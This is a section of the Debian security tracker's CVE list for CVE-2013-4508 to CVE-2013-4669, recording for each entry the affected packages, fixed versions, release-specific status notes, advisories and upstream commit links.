CVE-2013-4649 (Cross-site scripting (XSS) vulnerability in DotNetNuke (DNN) before 6. ...)
	NOT-FOR-US: DotNetNuke
CVE-2013-4648
	RESERVED
CVE-2013-4647
	RESERVED
CVE-2013-4646
	RESERVED
CVE-2013-4645
	RESERVED
CVE-2013-4644
	RESERVED
CVE-2013-4643
	RESERVED
CVE-2013-4642
	RESERVED
CVE-2013-4641
	RESERVED
CVE-2013-4640
	RESERVED
CVE-2013-4639
	RESERVED
CVE-2013-4638
	RESERVED
CVE-2013-4637
	RESERVED
CVE-2013-4669 (FortiClient before 4.3.5.472 on Windows, before 4.0.3.134 on Mac OS X, ...)
	NOT-FOR-US: FortiClient
CVE-2013-4636 (The mget function in libmagic/softmagic.c in the Fileinfo component in ...)
	- php5 5.5.0+dfsg-1
	[squeeze] - php5 (Introduced with 10367fa7c6a4a2cf9bee02d8905e284185428f09)
	[wheezy] - php5 (Introduced with 10367fa7c6a4a2cf9bee02d8905e284185428f09)
	- file (bug in code modified for PHP)
	NOTE: Tested with the squeeze and wheezy versions
CVE-2013-4635 (Integer overflow in the SdnToJewish function in jewish.c in the Calend ...)
	- php5 5.5.0+dfsg-1 (unimportant)
	NOTE: exploitable by malicious scripts only
CVE-2013-4634 (SQL injection vulnerability in the jQuery autocomplete for indexed_sea ...)
	NOT-FOR-US: rzautocomplete extension for TYPO3
CVE-2013-4633 (Huawei Seco Versatile Security Manager (VSM) before V200R002C00SPC300 ...)
	NOT-FOR-US: Huawei Seco Versatile Security Manager
CVE-2013-4632 (The Huawei Access Router (AR) before V200R002SPC003 allows remote atta ...)
	NOT-FOR-US: The Huawei Access Router
CVE-2013-4631 (Huawei AR 150, 200, 1200, 2200, and 3200 routers, when SNMPv3 is enabl ...)
	NOT-FOR-US: Huawei AR 150, 200, 1200, 2200, and 3200 routers
CVE-2013-4630 (Stack-based buffer overflow on Huawei AR 150, 200, 1200, 2200, and 320 ...)
	NOT-FOR-US: Huawei routers
CVE-2013-4629 (The Huawei viewpoint VP9610 and VP9620 units for the Huawei Video Conf ...)
	NOT-FOR-US: Huawei viewpoint
CVE-2013-4628 (The firewall module on the Huawei Quidway Service Process Unit (SPU) b ...)
	NOT-FOR-US: Huawei Quidway Service Process Unit
CVE-2013-4627 (Unspecified vulnerability in bitcoind and Bitcoin-Qt 0.8.x allows remo ...)
	- bitcoin 0.8.3-1
CVE-2013-4626 (Cross-site scripting (XSS) vulnerability in the BackWPup plugin before ...)
	NOT-FOR-US: WordPress plugin BackWPup
CVE-2013-4625 (Cross-site scripting (XSS) vulnerability in files/installer.cleanup.ph ...)
	NOT-FOR-US: WordPress plugin Duplicator
CVE-2013-4624 (Multiple cross-site scripting (XSS) vulnerabilities in Jahia xCM 6.6.1 ...)
	NOT-FOR-US: Jahia xCM
CVE-2013-4623 (The x509parse_crt function in x509.h in PolarSSL 1.1.x before 1.1.7 an ...)
	{DSA-2782-1}
	- polarssl 1.2.8-1 (low; bug #719954)
CVE-2013-4622 (The 3G Mobile Hotspot feature on the HTC Droid Incredible has a defaul ...)
	NOT-FOR-US: HTC Droid Incredible
CVE-2013-4621 (Magnolia CMS before 4.5.9 has multiple access bypass vulnerabilities ...)
	NOT-FOR-US: Magnolia CMS
CVE-2013-4620 (Cross-site scripting (XSS) vulnerability in interface/main/onotes/offi ...)
	NOT-FOR-US: OpenEMR
CVE-2013-4619 (Multiple SQL injection vulnerabilities in OpenEMR 4.1.1 allow remote a ...)
	NOT-FOR-US: OpenEMR
CVE-2013-4618
	RESERVED
CVE-2013-4617 (Jahia xCM before 6.6.2 does not include the HTTPOnly flag in a Set-Coo ...)
	NOT-FOR-US: Jahia xCM
CVE-2013-4616 (The WifiPasswordController generateDefaultPassword method in Preferenc ...)
	NOT-FOR-US: Apple iOS
CVE-2013-4615 (The Canon MG3100, MG5300, MG6100, MP495, MX340, MX870, MX890, MX920, a ...)
	NOT-FOR-US: EMC Smarts Network Configuration Manager
CVE-2013-4614 (English/pages_MacUS/wls_set_content.html on the Canon MG3100, MG5300, ...)
	NOT-FOR-US: EMC Smarts Network Configuration Manager
CVE-2013-4613 (The default configuration of the administrative interface on the Canon ...)
	NOT-FOR-US: EMC RSA Data Protection Manager Appliance
CVE-2013-4612 (Multiple cross-site scripting (XSS) vulnerabilities in REDCap before 5 ...)
	NOT-FOR-US: REDCap
CVE-2013-4611 (Multiple unspecified vulnerabilities in REDCap before 5.1.1 allow remo ...)
	NOT-FOR-US: REDCap
CVE-2013-4610 (Unspecified vulnerability in the Data Search utility in data-entry for ...)
	NOT-FOR-US: REDCap
CVE-2013-4609 (REDCap before 5.0.4 and 5.1.x before 5.1.3 does not reject certain und ...)
	NOT-FOR-US: REDCap
CVE-2013-4608 (Cross-site scripting (XSS) vulnerability in REDCap before 5.0.6 allows ...)
	NOT-FOR-US: REDCap
CVE-2013-4607
	RESERVED
CVE-2013-4606
	RESERVED
CVE-2013-4605
	RESERVED
CVE-2013-4604 (Fortinet FortiOS before 5.0.3 on FortiGate devices does not properly r ...)
	NOT-FOR-US: Fortinet FortiOS
CVE-2013-4603
	RESERVED
CVE-2013-4602 (A Denial of Service (infinite loop) vulnerability exists in Avira Anti ...)
	NOT-FOR-US: Avira
CVE-2013-4601
	RESERVED
CVE-2013-4600 (Multiple cross-site scripting (XSS) vulnerabilities in Alkacon OpenCms ...)
	NOT-FOR-US: Alkacon OpenCms
CVE-2013-4599 (The Misery module 6.x-2.x before 6.x-2.5 and 7.x-2.x before 7.x-2.2 fo ...)
	NOT-FOR-US: Drupal module misery
CVE-2013-4598 (The Groups, Communities and Co (GCC) module 7.x-1.x before 7.x-1.1 for ...)
	NOT-FOR-US: Drupal module GCC
CVE-2013-4597 (The Revisioning module 7.x-1.x before 7.x-1.6 for Drupal does not prop ...)
	NOT-FOR-US: Drupal module Revisioning
CVE-2013-4596 (The Node Access Keys module 7.x-1.x before 7.x-1.1 for Drupal does not ...)
	NOT-FOR-US: Drupal module Node Access Keys
CVE-2013-4595 (The Secure Pages module 6.x-2.x before 6.x-2.0 for Drupal does not pro ...)
	NOT-FOR-US: Drupal module Secure Pages
CVE-2013-4594 (The Payment for Webform module 7.x-1.x before 7.x-1.5 for Drupal does ...)
	NOT-FOR-US: Drupal module Payment for Webform
CVE-2013-4593 (RubyGem omniauth-facebook has an access token security vulnerability ...)
	- ruby-omniauth-facebook (Fixed before initial release)
CVE-2013-4592 (Memory leak in the __kvm_set_memory_region function in virt/kvm/kvm_ma ...)
	- linux 3.8-1
	- linux-2.6
	[squeeze] - linux-2.6 (Too intrusive to backport, KVM server not supported in squeeze-lts)
	[wheezy] - linux 3.2.53-1
CVE-2013-4591 (Buffer overflow in the __nfs4_get_acl_uncached function in fs/nfs/nfs4 ...)
	- linux 3.8-1
	[wheezy] - linux (Introduced in 3.6)
	- linux-2.6 (Introduced in 3.6)
	NOTE: http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=12d6e7538e2d418c08f082b1b44ffa5fb7270ed8
	NOTE: http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=e40f193f5bb022e927a57a4f5d5194e4f12ddb74
CVE-2013-4590 (Apache Tomcat before 6.0.39, 7.x before 7.0.50, and 8.x before 8.0.0-R ...)
	{DSA-3530-1 DLA-91-1}
	- tomcat6 6.0.39 (low)
	[squeeze] - tomcat6 (Minor issue)
	- tomcat7 7.0.50 (low)
	[wheezy] - tomcat7 (Minor issue)
	- tomcat8 8.0.0
CVE-2013-4589 (The ExportAlphaQuantumType function in export.c in GraphicsMagick befo ...)
	- graphicsmagick 1.3.18-1 (low; bug #729661)
	[squeeze] - graphicsmagick (Minor issue)
	[wheezy] - graphicsmagick (Minor issue)
CVE-2013-4588 (Multiple stack-based buffer overflows in net/netfilter/ipvs/ip_vs_ctl. ...)
	{DSA-2906-1}
	- linux (fixed in 2.6.33)
	- linux-2.6 2.6.37-1
	NOTE: 2.6.37-1 first version including 2.6.33 in unstable for linux-2.6
	NOTE: https://git.kernel.org/linus/04bcef2a83f40c6db24222b27a52892cba39dffb
	NOTE: http://seclists.org/fulldisclosure/2013/Nov/77
CVE-2013-4587 (Array index error in the kvm_vm_ioctl_create_vcpu function in virt/kvm ...)
	{DSA-2906-1}
	- linux 3.12.5-1
	- linux-2.6
	[wheezy] - linux 3.2.54-1
CVE-2013-4586
	RESERVED
CVE-2013-4585
	RESERVED
CVE-2013-4584 (Perdition before 2.2 may have weak security when handling outbound con ...)
	- perdition 2.1-1 (low; bug #729028)
	[wheezy] - perdition (Minor issue)
	[squeeze] - perdition (Minor issue)
CVE-2013-4583 (The parse_cmd function in lib/gitlab_shell.rb in GitLab 5.0 before 5.4 ...)
	- gitlab (Fixed before initial upload to Debian)
CVE-2013-4582 (The (1) create_branch, (2) create_tag, (3) import_project, and (4) for ...)
	- gitlab (Fixed before initial upload to Debian)
CVE-2013-4581 (GitLab 5.0 before 5.4.2, Community Edition before 6.2.4, Enterprise Ed ...)
	- gitlab (Fixed before initial upload to Debian)
CVE-2013-4580 (GitLab before 5.4.2, Community Edition before 6.2.4, and Enterprise Ed ...)
	- gitlab (Fixed before initial upload to Debian)
CVE-2013-4579 (The ath9k_htc_set_bssid_mask function in drivers/net/wireless/ath/ath9 ...)
	- linux-2.6 (ath9k not yet present)
	- linux 3.12.8-1 (bug #729573)
	[wheezy] - linux 3.2.54-1
	NOTE: http://www.mathyvanhoef.com/2013/11/unmasking-spoofed-mac-address.html
CVE-2013-4578 (jarsigner in OpenJDK and Oracle Java SE before 7u51 allows remote atta ...)
	- openjdk-7 7u51-2.4.4-1
	- openjdk-6 6b30-1.13.1-1
CVE-2013-4577 (A certain Debian patch for GNU GRUB uses world-readable permissions fo ...)
	- grub2 2.00-20 (unimportant; bug #632598)
	NOTE: Additional hardening for rare setups, not a vulnerability
CVE-2013-4576 (GnuPG 1.x before 1.4.16 generates RSA keys using sequences of introduc ...)
	{DSA-2821-1}
	- gnupg 1.4.15-3
CVE-2013-4575 (Heap-based buffer overflow in the utility program in the Linux agent i ...)
	NOT-FOR-US: Symantec Backup Exec
CVE-2013-4574 (Cross-site scripting (XSS) vulnerability in the TimeMediaHandler exten ...)
	NOT-FOR-US: TimedMediaHandler mediawiki extension
	NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=56699
CVE-2013-4573 (Cross-site scripting (XSS) vulnerability in the ZeroRatedMobileAccess ...)
	NOT-FOR-US: mediawiki extension ZeroRatedMobileAccess
CVE-2013-4572 (The CentralNotice extension for MediaWiki before 1.19.9, 1.20.x before ...)
	{DSA-2891-1}
	- mediawiki 1:1.19.8+dfsg-2.2 (bug #729629)
	[squeeze] - mediawiki
	NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=53032
CVE-2013-4571 (Buffer overflow in php-luasandbox in the Scribuntu extension for Media ...)
	NOT-FOR-US: php-luasandbox / Scribunto mediawiki extension
	NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=49705
CVE-2013-4570 (The zend_inline_hash_func function in php-luasandbox in the Scribuntu ...)
	NOT-FOR-US: php-luasandbox / Scribunto mediawiki extension
	NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=54527
CVE-2013-4569 (The CleanChanges extension for MediaWiki before 1.19.9, 1.20.x before ...)
	NOT-FOR-US: mediawiki extension CleanChanges
CVE-2013-4568 (Incomplete blacklist vulnerability in Sanitizer::checkCss in MediaWiki ...)
	{DSA-2891-1}
	- mediawiki 1:1.19.8+dfsg-2.2 (bug #729629)
	[squeeze] - mediawiki
	NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=55332
CVE-2013-4567 (Incomplete blacklist vulnerability in Sanitizer::checkCss in MediaWiki ...)
	{DSA-2891-1}
	- mediawiki 1:1.19.8+dfsg-2.2 (bug #729629)
	[squeeze] - mediawiki
	NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=55332
CVE-2013-4566 (mod_nss 1.0.8 and earlier, when NSSVerifyClient is set to none for the ...)
	- libapache2-mod-nss 1.0.8-4 (low; bug #731627)
	[wheezy] - libapache2-mod-nss (Minor issue)
CVE-2013-4565 (Heap-based buffer overflow in the __OLEdecode function in ppthtml 0.5. ...)
	- xlhtml (low; bug #729279)
	[wheezy] - xlhtml (Minor issue)
	[squeeze] - xlhtml (Minor issue)
CVE-2013-4564 (Libreswan 3.6 allows remote attackers to cause a denial of service (cr ...)
	- libreswan (Fixed before initial upload to Debian)
	NOTE: https://libreswan.org/security/CVE-2013-4564/CVE-2013-4564.txt.asc
	NOTE: https://github.com/libreswan/libreswan/commit/9b31deafbdbf0c2206358dfbf2d4e343e365f23f
CVE-2013-4563 (The udp6_ufo_fragment function in net/ipv6/udp_offload.c in the Linux ...)
	- linux-2.6 (Introduced in v3.10-rc5)
	- linux 3.11.10-1
	[wheezy] - linux (Introduced in v3.10-rc5)
	NOTE: Introduced: http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=1e2bd517c108816220f262d7954b697af03b5f9c
	NOTE: fixed in: http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=0e033e0
CVE-2013-4562 (The omniauth-facebook gem 1.4.1 before 1.5.0 does not properly store t ...)
	- ruby-omniauth-facebook (Fixed before initial release)
	NOTE: https://github.com/mkdynamic/omniauth-facebook/commit/ccfcc26fe7e34acbd75ad4a095fd01ce5ff48ee7
CVE-2013-4561
	RESERVED
	NOT-FOR-US: OpenShift
CVE-2013-4560 (Use-after-free vulnerability in lighttpd before 1.4.33 allows remote a ...)
	{DSA-2795-1}
	- lighttpd 1.4.33-1+nmu1 (bug #729453)
CVE-2013-4559 (lighttpd before 1.4.33 does not check the return value of the (1) setu ...)
	{DSA-2795-1}
	- lighttpd 1.4.33-1+nmu1 (bug #729453)
CVE-2013-4558 (The get_parent_resource function in repos.c in mod_dav_svn Apache HTTP ...)
	- subversion 1.7.14-1
	[squeeze] - subversion (Only affects 1.7.11 through 1.7.13 and 1.8.1 through 1.8.4)
	[wheezy] - subversion (Only affects 1.7.11 through 1.7.13 and 1.8.1 through 1.8.4)
	NOTE: http://subversion.apache.org/security/CVE-2013-4558-advisory.txt
CVE-2013-4557 (The Security Screen (_core_/securite/ecran_securite.php) before 1.1.8 ...)
	{DSA-2794-1}
	- spip 2.1.24-1 (bug #729172)
CVE-2013-4556 (Cross-site scripting (XSS) vulnerability in the author page (prive/for ...)
	{DSA-2794-1}
	- spip 2.1.24-1 (bug #729172)
CVE-2013-4555 (Cross-site request forgery (CSRF) vulnerability in ecrire/action/logou ...)
	{DSA-2794-1}
	- spip 2.1.24-1 (bug #729172)
CVE-2013-4554 (Xen 3.0.3 through 4.1.x (possibly 4.1.6.1), 4.2.x (possibly 4.2.3), an ...)
	- xen (Doesn't affect Linux)
CVE-2013-4553 (The XEN_DOMCTL_getmemlist hypercall in Xen 3.4.x through 4.3.x (possib ...)
	{DSA-3006-1}
	- xen 4.4.0-1
	[squeeze] - xen (Unsupported in squeeze-lts)
CVE-2013-4552 (lib/Auth/Source/External.php in the drupalauth module before 1.2.2 for ...)
	NOT-FOR-US: drupalauth module for simpleSAMLphp
CVE-2013-4551 (Xen 4.2.x and 4.3.x, when nested virtualization is disabled, does not ...)
	- xen 4.4.0-1
	[wheezy] - xen (Only affects 4.2.x and later)
	[squeeze] - xen (Only affects 4.2.x and later)
CVE-2013-4550 (Bip before 0.8.9, when running as a daemon, writes SSL handshake error ...)
	- bip 0.8.9-1 (low)
	[wheezy] - bip (Minor issue)
	[squeeze] - bip (Minor issue)
	NOTE: Upstream commit: https://projects.duckcorp.org/projects/bip/repository/revisions/df45c4c2d6f892e3e1dec23ce0ed2575b53a7d8c
	NOTE: https://projects.duckcorp.org/issues/261
	NOTE: Difference between CVE-2011-5268 and CVE-2013-4550: https://www.openwall.com/lists/oss-security/2014/01/02/9
CVE-2013-4549 (QXmlSimpleReader in Qt before 5.2 allows context-dependent attackers t ...)
	- qtbase-opensource-src 5.1.1+dfsg-6
	- qt4-x11 4:4.8.5+git192-g085f851+dfsg-1 (low; bug #750141)
	[wheezy] - qt4-x11 (Minor issue)
	[squeeze] - qt4-x11 (Minor issue)
	NOTE: https://codereview.qt-project.org/#change,70708
CVE-2013-4548 (The mm_newkeys_from_blob function in monitor_wrap.c in sshd in OpenSSH ...)
	- openssh 1:6.4p1-1 (bug #729029)
	[wheezy] - openssh (AES-GCM support introduced in 6.2)
	[squeeze] - openssh (AES-GCM support introduced in 6.2)
CVE-2013-4547 (nginx 0.8.41 through 1.4.3 and 1.5.x before 1.5.7 allows remote attack ...)
	{DSA-2802-1}
	- nginx 1.4.4-1 (bug #730012)
	[squeeze] - nginx (Only applies to 0.8.41 - 1.5.6)
CVE-2013-4546 (The repository import feature in gitlab-shell before 1.7.4, as used in ...)
	- gitlab (Fixed before initial upload to Debian)
CVE-2013-4545 (cURL and libcurl 7.18.0 through 7.32.0, when built with OpenSSL, disab ...)
	{DSA-2798-1}
	- curl 7.33.0-1
CVE-2013-4544 (hw/net/vmxnet3.c in QEMU 2.0.0-rc0, 1.7.1, and earlier allows local gu ...)
	- qemu 2.0.0+dfsg-1
	[wheezy] - qemu (Introduced in 1.4)
	[squeeze] - qemu (Introduced in 1.4)
	- qemu-kvm (Introduced in 1.4)
	NOTE: see BTS bug #744213
CVE-2013-4543
	REJECTED
CVE-2013-4542 (The virtio_scsi_load_request function in hw/scsi/scsi-bus.c in QEMU be ...)
	- qemu 2.1+dfsg-1 (low; bug #739589)
	[wheezy] - qemu (Minor issue, hardly exploitable in practice)
	[squeeze] - qemu (Minor issue, hardly exploitable in practice)
	[wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice)
	- qemu-kvm (low)
	[squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice)
	NOTE: virtio-scsi support introduced in v1.1: http://wiki.qemu.org/ChangeLog/1.1
CVE-2013-4541 (The usb_device_post_load function in hw/usb/bus.c in QEMU before 1.7.2 ...)
	- qemu 2.1+dfsg-1 (low; bug #739589)
	[wheezy] - qemu (Minor issue, hardly exploitable in practice)
	[squeeze] - qemu (Minor issue, hardly exploitable in practice)
	[wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice)
	- qemu-kvm (low)
	[squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice)
CVE-2013-4540 (Buffer overflow in scoop_gpio_handler_update in QEMU before 1.7.2 migh ...)
	- qemu 2.1+dfsg-1 (low; bug #739589)
	[wheezy] - qemu (Minor issue, hardly exploitable in practice)
	[squeeze] - qemu (Minor issue, hardly exploitable in practice)
	[wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice)
	- qemu-kvm (low)
	[squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice)
CVE-2013-4539 (Multiple buffer overflows in the tsc210x_load function in hw/input/tsc ...)
	- qemu 2.1+dfsg-1 (low; bug #739589)
	[wheezy] - qemu (Minor issue, hardly exploitable in practice)
	[squeeze] - qemu (Minor issue, hardly exploitable in practice)
	[wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice)
	- qemu-kvm (low)
	[squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice)
CVE-2013-4538 (Multiple buffer overflows in the ssd0323_load function in hw/display/s ...)
	- qemu 2.1+dfsg-1 (low; bug #739589)
	[wheezy] - qemu (Minor issue, hardly exploitable in practice)
	[squeeze] - qemu (Minor issue, hardly exploitable in practice)
	[wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice)
	- qemu-kvm (low)
	[squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice)
CVE-2013-4537 (The ssi_sd_transfer function in hw/sd/ssi-sd.c in QEMU before 1.7.2 al ...)
	- qemu 2.1+dfsg-1 (low; bug #739589)
	[wheezy] - qemu (Minor issue, hardly exploitable in practice)
	[squeeze] - qemu (Minor issue, hardly exploitable in practice)
	[wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice)
	- qemu-kvm (low)
	[squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice)
CVE-2013-4536
	RESERVED
	- qemu 2.1+dfsg-1 (low; bug #739589)
	[wheezy] - qemu (Minor issue, hardly exploitable in practice)
	[squeeze] - qemu (Minor issue, hardly exploitable in practice)
	[wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice)
	- qemu-kvm (low)
	[squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice)
CVE-2013-4535 (The virtqueue_map_sg function in hw/virtio/virtio.c in QEMU before 1.7 ...)
	- qemu 2.1+dfsg-1 (low; bug #739589)
	[wheezy] - qemu (Minor issue, hardly exploitable in practice)
	[squeeze] - qemu (Minor issue, hardly exploitable in practice)
	[wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice)
	- qemu-kvm (low)
	[squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice)
CVE-2013-4534 (Buffer overflow in hw/intc/openpic.c in QEMU before 1.7.2 allows remot ...)
	- qemu 2.1+dfsg-1 (low; bug #739589)
	[wheezy] - qemu (Minor issue, hardly exploitable in practice)
	[squeeze] - qemu (Minor issue, hardly exploitable in practice)
	[wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice)
	- qemu-kvm (low)
	[squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice)
CVE-2013-4533 (Buffer overflow in the pxa2xx_ssp_load function in hw/arm/pxa2xx.c in ...)
	- qemu 2.1+dfsg-1 (low; bug #739589)
	[wheezy] - qemu (Minor issue, hardly exploitable in practice)
	[squeeze] - qemu (Minor issue, hardly exploitable in practice)
	[wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice)
	- qemu-kvm (low)
	[squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice)
CVE-2013-4532 (Qemu 1.1.2+dfsg to 2.1+dfsg suffers from a buffer overrun which could ...)
	- qemu 2.1+dfsg-1 (low; bug #739589)
	[squeeze] - qemu (Minor issue, hardly exploitable in practice)
	[wheezy] - qemu (Minor issue, hardly exploitable in practice)
	[wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice)
	- qemu-kvm (low)
	[squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice)
CVE-2013-4531 (Buffer overflow in target-arm/machine.c in QEMU before 1.7.2 allows re ...)
	- qemu 2.1+dfsg-1 (low; bug #739589)
	[wheezy] - qemu (Minor issue, hardly exploitable in practice)
	[squeeze] - qemu (Minor issue, hardly exploitable in practice)
	[wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice)
	- qemu-kvm (low)
	[squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice)
CVE-2013-4530 (Buffer overflow in hw/ssi/pl022.c in QEMU before 1.7.2 allows remote a ...)
	- qemu 2.1+dfsg-1 (low; bug #739589)
	[wheezy] - qemu (Minor issue, hardly exploitable in practice)
	[wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice)
	[squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice)
	[squeeze] - qemu (Minor issue, hardly exploitable in practice)
	- qemu-kvm
CVE-2013-4529 (Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remot ...)
	- qemu 2.1+dfsg-1 (low; bug #739589)
	[wheezy] - qemu (Minor issue, hardly exploitable in practice)
	[wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice)
	[squeeze] - qemu (Minor issue, hardly exploitable in practice)
	- qemu-kvm (low)
	[squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice)
CVE-2013-4528 REJECTED
CVE-2013-4527 (Buffer overflow in hw/timer/hpet.c in QEMU before 1.7.2 might allow re ...)
	- qemu 2.1+dfsg-1 (low; bug #739589)
	[wheezy] - qemu (Minor issue, hardly exploitable in practice)
	[squeeze] - qemu (Minor issue, hardly exploitable in practice)
	[wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice)
	- qemu-kvm (low)
	[squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice)
CVE-2013-4526 (Buffer overflow in hw/ide/ahci.c in QEMU before 1.7.2 allows remote at ...)
	- qemu 2.1+dfsg-1 (low; bug #739589)
	[squeeze] - qemu (Minor issue, hardly exploitable in practice)
	[wheezy] - qemu (Minor issue, hardly exploitable in practice)
	[wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice)
	- qemu-kvm (low)
	[squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice)
CVE-2013-4525 (Cross-site scripting (XSS) vulnerability in mod/quiz/report/responses/ ...)
	- moodle 2.5.3-1
	[squeeze] - moodle (Vulnerable code not present)
CVE-2013-4524 (Directory traversal vulnerability in repository/filesystem/lib.php in ...)
	- moodle 2.5.3-1
	[squeeze] - moodle (Vulnerable code not present)
CVE-2013-4523 (Cross-site scripting (XSS) vulnerability in message/lib.php in Moodle ...)
	- moodle 2.5.3-1
	[squeeze] - moodle (Unsupported in squeeze-lts)
CVE-2013-4522 (lib/filelib.php in Moodle through 2.2.11, 2.3.x before 2.3.10, 2.4.x b ...)
	- moodle 2.5.3-1 (low)
	[squeeze] - moodle (Vulnerable code not present)
CVE-2013-4521 (RichFaces implementation in Nuxeo Platform 5.6.0 before HF27 and 5.8.0 ...)
	NOT-FOR-US: Nuxeo
CVE-2013-4520 (xslt.c in libxslt before 1.1.25 allows context-dependent attackers to ...)
	- libxslt (The versions in wheezy and squeeze contain the full patch)
CVE-2013-4519 (Multiple cross-site scripting (XSS) vulnerabilities in Review Board 1. ...)
	- reviewboard (bug #653113)
CVE-2013-4518 (RHUI (Red Hat Update Infrastructure) 2.1.3 has world readable PKI enti ...)
	NOT-FOR-US: Red Hat Update Infrastructure
CVE-2013-4517 (Apache Santuario XML Security for Java before 1.5.6, when applying Tra ...)
	- libxml-security-java 1.5.6-1 (bug #733938)
	[squeeze] - libxml-security-java (Minor issue, too intrusive to backport)
	[wheezy] - libxml-security-java (Minor issue, too intrusive to backport)
	NOTE: http://santuario.apache.org/secadv.data/cve-2013-4517.txt.asc
CVE-2013-4516 (The mp_get_count function in drivers/staging/sb105x/sb_pci_mp.c in the ...)
	- linux 3.12-1 (unimportant)
	[wheezy] - linux (Affected code not present yet)
	- linux-2.6 (Affected code not present yet)
	NOTE: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=a8b33654b1e3b0c74d4a1fed041c9aae50b3c427
	NOTE: Not enabled in Debian kernels; staging drivers are not supported
CVE-2013-4515 (The bcm_char_ioctl function in drivers/staging/bcm/Bcmchar.c in the Li ...)
	- linux 3.12-1 (unimportant)
	NOTE: bcm driver not built
	- linux-2.6 (Affected code not present yet)
	NOTE: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8d1e72250c847fa96498ec029891de4dc638a5ba
	NOTE: Not enabled in Debian kernels; staging drivers are not supported
CVE-2013-4514 (Multiple buffer overflows in drivers/staging/wlags49_h2/wl_priv.c in t ...)
	- linux 3.12-1 (unimportant)
	NOTE: wlags49_h2 driver not built
	- linux-2.6 (Affected code not present yet)
	NOTE: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=b5e2f339865fb443107e5b10603e53bbc92dc054
	NOTE: Not enabled in Debian kernels; staging drivers are not supported
CVE-2013-4513 (Buffer overflow in the oz_cdev_write function in drivers/staging/ozwpa ...)
	- linux 3.12-1 (unimportant)
	[wheezy] - linux (Affected code not present yet)
	- linux-2.6 (Affected code not present yet)
	NOTE: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=c2c65cd2e14ada6de44cb527e7f1990bede24e15
	NOTE: Not enabled in Debian kernels; staging drivers are not supported
CVE-2013-4512 (Buffer overflow in the exitcode_proc_write function in arch/um/kernel/ ...)
	{DSA-2906-1}
	- linux 3.11.8-1 (low)
	- linux-2.6 (low)
	[wheezy] - linux 3.2.53-1
	NOTE: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=201f99f170df14ba52ea4c52847779042b7a623b
CVE-2013-4511 (Multiple integer overflows in Alchemy LCD frame-buffer drivers in the ...)
	{DSA-2906-1}
	- linux 3.11.8-1
	- linux-2.6
	[wheezy] - linux 3.2.53-1
	NOTE: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=7314e613d
CVE-2013-4510 (Directory traversal vulnerability in the client in Tryton 3.0.0, as di ...)
	{DSA-2791-1}
	- tryton-client 2.8.4-1
	NOTE: https://bugs.tryton.org/issue3446
CVE-2013-4509 (The default configuration of IBUS 1.5.4, and possibly 1.5.2 and earlie ...)
	- mozc 1.12.1599.102-1 (low; bug #729065)
	[wheezy] - mozc (Only in combination with Ibus 1.5.4, which is not in stable)
	- ibus-anthy 1.5.4-1 (low; bug #729065)
	[wheezy] - ibus-anthy (Only in combination with Ibus 1.5.4, which is not in stable)
	[squeeze] - ibus-anthy (Only in combination with Ibus 1.5.4, which is not in oldstable)
	- ibus-pinyin 1.5.0-1 (low; bug #729065)
	[wheezy] - ibus-pinyin (Only in combination with Ibus 1.5.4, which is not in stable)
	[squeeze] - ibus-pinyin (Only in combination with Ibus 1.5.4, which is not in oldstable)
	- ibus-chewing 1.4.3-4 (low; bug #730781)
	[wheezy] - ibus-chewing (Only in combination with Ibus 1.5.4, which is not in stable)
	[squeeze] - ibus-chewing (Only in combination with Ibus 1.5.4, which is not in oldstable)
	NOTE: https://www.openwall.com/lists/oss-security/2013/11/04/2
	NOTE: This is rather a bug in the various IBus engines not in ibus itself, asked maintainers to investigate affected engines,
	NOTE: can be assigned to affected engines once more info is available
	NOTE: Introduced in 1.5, so stable/oldstable not affected
CVE-2013-4508 (lighttpd before 1.4.34, when SNI is enabled, configures weak SSL ciphe ...)
	{DSA-2795-1}
	- lighttpd 1.4.33-1+nmu1 (bug #729453)
